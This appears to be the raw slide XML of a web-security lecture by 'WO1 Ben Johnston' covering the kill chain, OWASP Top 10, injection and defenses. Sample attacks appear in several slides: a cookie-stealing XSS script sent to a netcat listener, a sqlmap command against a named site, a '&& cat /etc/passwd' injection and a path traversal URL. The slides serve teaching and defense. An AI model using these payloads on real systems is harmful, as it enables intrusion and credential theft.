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chlaw.com/dashboard?search=Gol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04e855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04e855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f04e855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f04e855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error messaging helps with injection and enumeration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f04e855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f04e855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f04e855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f04e855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f04e855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f04e855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3379ad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3379ad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f04e855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f04e855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f04e855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f04e855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f04e855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f04e855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f04e8554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f04e8554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772612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772612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f04e8554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f04e8554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f04e855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f04e855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04e855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04e855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f04e855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f04e855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f3379ad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f3379ad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defend?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f3379ad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f3379ad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f3379ad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f3379ad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defend our apis?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f3379ad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f3379ad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&lt;script&gt;document.write('&lt;img src="http://192.168.158.135:8080/bad.jpg?cookie=' + document.cookie + '" /&gt;')&lt;/script&gt;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 up netcat: nc -l -p 8080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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>defend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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3379ad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f3379ad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f3379ad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f3379ad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Sqlmap -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://dchlaw.com/dashboard?search=Golf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> --dbs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ed1d09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ed1d09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f3379add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f3379add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f3379ad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f3379ad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f3379add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f3379add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2a918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2a918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2a918b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2a918b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d1d09a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d1d09a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logs show remote IP, user agent string, query string (payloads)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2a918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f2a918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ed1d09a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ed1d09a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Struts is a Java application framework. It was vulnerable to malformed Content-Type Headers. The Content Type header would be evaluated as part of building the error message. This allowed an attacker to send arbitrary Java code, which would be used to execute system commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Runtime.getRuntime().exec(command)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04e85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04e85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Recon - OSINT searches, Job postings, dorking, social media, Wayback machine, WHOIS. DEFENSE: Know thyself</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weaponization - Building the payload (DOC with macro, phishing email, USB with malware). Testing. No interaction with the target(yet) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Delivery - Transmitting the payload to the target (send the email, drop the USB) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEFENSE: User Training, Phish filters, IDS/Firewall rules</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploitation - The “detonation” of the payload. Exploit code is run on the system DEFENSE: Anti-virus, HIPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Installation - The attacker installs tools, backdoors, malware needed to complete objectives. DEFENSE: Anti-virus, app whitelisting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C2 - The malware “calls home” to ask for instructions. Typically seen on the network as beaconing DEFENSE: Network traffic analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Actions on Objectives - Steal business data, credit card skimming, ransomware, pivoting DEFENSE: User training (abnormal behavior), password complexity / rotation, data protection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acme.com/menu.php?page=user.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://acme.com/menu.php?page=../../../../../../../../../etc/passw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cmebank.com/account/12345" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://acmebank.com/account/98765" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spybook.com/user/12345/changepassword" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spybook.com/user/98765/changepasswor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chlaw.com/dashboard?search=Gol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io/JuKAj"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Forensics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WO1 Ben Johnston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Kill Chain - Web specifics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Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passive - search engines, wayback machine, whois</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active - WAF detection, page crawling, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>username enumeration, view source</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weaponization - Injection Payloads, Web server overflow payload, web shells</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Delivery - Interact with contact form, search form. Send payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploitation - SQL query runs, Cookie stolen</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Installation - Web shell stored on web server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Command and Control - Installing a user, Installing non-web based backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Actions on Objectives - Extract user data, Extract business data, pivot to internal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Defense of Web Attacks - Defense in Depth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="375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DMZ, DMZ, DMZ</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Application Firewalls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network IDS (with threat intelligence)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DDoS protection service (e.g. Cloudflare)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User Phish Training/Simulation (e.g. KnowBe4)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Server Patches (2017 Apache Struts)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Static Code Analysis (e.g. Fortify)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Developer Training</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proper Error Messaging (helpful, not too detailed)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Input Validation, Output Encoding!!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Google Shape;126;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444375" y="1152475"/>
            <a:ext cx="2387925" cy="1285800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Google Shape;127;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283250" y="2935900"/>
            <a:ext cx="2549050" cy="163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 Open Web Application Security Project</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Offers valuable resources for developers and cyber defenders</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Testing Guides</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Detailed Explanations of real exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cheat Sheets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check Lists</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Local chapters and other training</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Famous Top 10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Top 10</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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XML External Entities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using Components with Known Vulnerabilities (aka Wordpress)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insufficient Logging &amp;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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="10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Happens when application accepts user input</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker sends data other than what the developer intended</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most database code libraries have safety functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Google Shape;146;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105425" y="3514197"/>
            <a:ext cx="4726875" cy="1454950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3039025"/>
            <a:ext cx="8839199" cy="348296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2376513"/>
            <a:ext cx="6067425" cy="333375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479275" y="2395175"/>
            <a:ext cx="13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SAFE</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168900" y="2732975"/>
            <a:ext cx="26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Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>
              </a:rPr>
              <a:t>Raw SQL, This is dangerous</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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Injection Types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Command Injection - Code that runs a system Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>System(“ping “ + USER_INPUT)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Injection payload: 127.0.0.1 &amp;&amp; cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remote File Include - Found often with older PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://acme.com/menu.php?page=user.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
